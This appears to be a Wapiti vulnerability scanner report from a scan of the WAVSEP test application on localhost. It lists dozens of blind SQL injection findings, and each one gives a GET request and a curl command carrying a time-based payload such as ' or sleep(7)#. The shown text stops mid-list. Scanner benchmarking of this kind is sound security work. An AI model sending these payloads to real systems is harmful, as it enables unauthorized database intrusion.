Wapiti vulnerability report

Target: http://127.0.0.1:8090/wavsep/

Date of the scan: Tue, 29 May 2018 02:00:16 +0000. Scope of the scan: domain


Summary

Category Number of vulnerabilities found
SQL Injection 0
Blind SQL Injection 66
File Handling 1820
Cross Site Scripting 226
CRLF Injection 0
Commands execution 0
Htaccess Bypass 0
Backup file 0
Potentially dangerous file 0
Server Side Request Forgery 76
Internal Server Error 550
Resource consumption 0

Blind SQL Injection

Description
Blind SQL injection is a technique that exploits a vulnerability occurring in the database of an application. This kind of vulnerability is harder to detect than basic SQL injections because no error message will be displayed on the webpage.

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error-Experimental/Case01-InjectionInInsertValues-String-BinaryDeliberateRuntimeError-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error-Experimental/Case01-InjectionInInsertValues-String-BinaryDeliberateRuntimeError-With200Errors.jsp?msg=%27%20or%20sleep%287%29%3D%27&target=a%40a.com HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error-Experimental/Case01-InjectionInInsertValues-String-BinaryDeliberateRuntimeError-With200Errors.jsp?msg=%27%20or%20sleep%287%29%3D%27&target=a%40a.com"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case01-InjectionInLogin-String-LoginBypass-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case01-InjectionInLogin-String-LoginBypass-With200Errors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case01-InjectionInLogin-String-LoginBypass-With200Errors.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case03-InjectionInCalc-String-BooleanExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case03-InjectionInCalc-String-BooleanExploit-With200Errors.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case03-InjectionInCalc-String-BooleanExploit-With200Errors.jsp?username=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case04-InjectionInUpdate-String-CommandInjection-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case04-InjectionInUpdate-String-CommandInjection-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case04-InjectionInUpdate-String-CommandInjection-With200Errors.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case06-InjectionInView-Numeric-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case07-InjectionInSearch-Numeric-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case08-InjectionInCalc-Numeric-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case09-InjectionInUpdate-Numeric-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-With200Errors.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case11-InjectionInView-Date-PermissionBypass-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case11-InjectionInView-Date-PermissionBypass-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case11-InjectionInView-Date-PermissionBypass-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case12-InjectionInSearch-Date-UnionExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case12-InjectionInSearch-Date-UnionExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case12-InjectionInSearch-Date-UnionExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case13-InjectionInCalc-Date-BooleanExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case13-InjectionInCalc-Date-BooleanExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case13-InjectionInCalc-Date-BooleanExploit-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case14-InjectionInUpdate-Date-CommandInjection-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case14-InjectionInUpdate-Date-CommandInjection-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case14-InjectionInUpdate-Date-CommandInjection-With200Errors.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-With200Errors.jsp?transactionDate=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-With200Errors.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-With200Errors.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-With200Errors.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-With200Errors.jsp?msgid=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case01-InjectionInView-Numeric-Blind-200ValidResponseWithDefaultOnException.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case01-InjectionInView-Numeric-Blind-200ValidResponseWithDefaultOnException.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case01-InjectionInView-Numeric-Blind-200ValidResponseWithDefaultOnException.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case02-InjectionInView-String-Blind-200ValidResponseWithDefaultOnException.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case02-InjectionInView-String-Blind-200ValidResponseWithDefaultOnException.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case02-InjectionInView-String-Blind-200ValidResponseWithDefaultOnException.jsp?username=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case03-InjectionInView-Date-Blind-200ValidResponseWithDefaultOnException.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case03-InjectionInView-Date-Blind-200ValidResponseWithDefaultOnException.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case03-InjectionInView-Date-Blind-200ValidResponseWithDefaultOnException.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case04-InjectionInUpdate-Numeric-TimeDelayExploit-200Identical.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case04-InjectionInUpdate-Numeric-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case04-InjectionInUpdate-Numeric-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case05-InjectionInUpdate-String-TimeDelayExploit-200Identical.jsp

Blind SQL vulnerability via injection in the parameter description
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case05-InjectionInUpdate-String-TimeDelayExploit-200Identical.jsp?description=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case05-InjectionInUpdate-String-TimeDelayExploit-200Identical.jsp?description=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case06-InjectionInUpdate-Date-TimeDelayExploit-200Identical.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case06-InjectionInUpdate-Date-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case06-InjectionInUpdate-Date-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case07-InjectionInUpdate-NumericWithoutQuotes-TimeDelayExploit-200Identical.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case07-InjectionInUpdate-NumericWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case07-InjectionInUpdate-NumericWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case08-InjectionInUpdate-DateWithoutQuotes-TimeDelayExploit-200Identical.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case08-InjectionInUpdate-DateWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Identical/Case08-InjectionInUpdate-DateWithoutQuotes-TimeDelayExploit-200Identical.jsp?transactionDate=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case01-InjectionInLogin-String-LoginBypass-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case01-InjectionInLogin-String-LoginBypass-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case01-InjectionInLogin-String-LoginBypass-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231&password=textvalue2"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case02-InjectionInSearch-String-UnionExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case02-InjectionInSearch-String-UnionExploit-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case02-InjectionInSearch-String-UnionExploit-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case03-InjectionInCalc-String-BooleanExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case03-InjectionInCalc-String-BooleanExploit-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case03-InjectionInCalc-String-BooleanExploit-WithDifferent200Responses.jsp?username=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case04-InjectionInUpdate-String-CommandInjection-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case04-InjectionInUpdate-String-CommandInjection-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case04-InjectionInUpdate-String-CommandInjection-WithDifferent200Responses.jsp?msg=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case06-InjectionInView-Numeric-PermissionBypass-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case06-InjectionInView-Numeric-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case06-InjectionInView-Numeric-PermissionBypass-WithDifferent200Responses.jsp?transactionId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case07-InjectionInSearch-Numeric-UnionExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case07-InjectionInSearch-Numeric-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case07-InjectionInSearch-Numeric-UnionExploit-WithDifferent200Responses.jsp?msgId=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case08-InjectionInCalc-Numeric-BooleanExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case08-InjectionInCalc-Numeric-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case08-InjectionInCalc-Numeric-BooleanExploit-WithDifferent200Responses.jsp?minBalanace=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case09-InjectionInUpdate-Numeric-CommandInjection-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case09-InjectionInUpdate-Numeric-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case09-InjectionInUpdate-Numeric-CommandInjection-WithDifferent200Responses.jsp?msgid=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithDifferent200Responses.jsp?orderby=sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case11-InjectionInView-Date-PermissionBypass-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case11-InjectionInView-Date-PermissionBypass-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case11-InjectionInView-Date-PermissionBypass-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case12-InjectionInSearch-Date-UnionExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case12-InjectionInSearch-Date-UnionExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case12-InjectionInSearch-Date-UnionExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case13-InjectionInCalc-Date-BooleanExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case13-InjectionInCalc-Date-BooleanExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case13-InjectionInCalc-Date-BooleanExploit-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case14-InjectionInUpdate-Date-CommandInjection-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case14-InjectionInUpdate-Date-CommandInjection-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case14-InjectionInUpdate-Date-CommandInjection-WithDifferent200Responses.jsp?transactionDate=%27%20or%20sleep%287%29%231"

Vulnerability found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp

Blind SQL vulnerability via injection in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-200Valid/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithDifferent200Responses.jsp?transactionDate=sleep%287%29%231 HTTP/1.1
Host: 127.0.0.1:8090
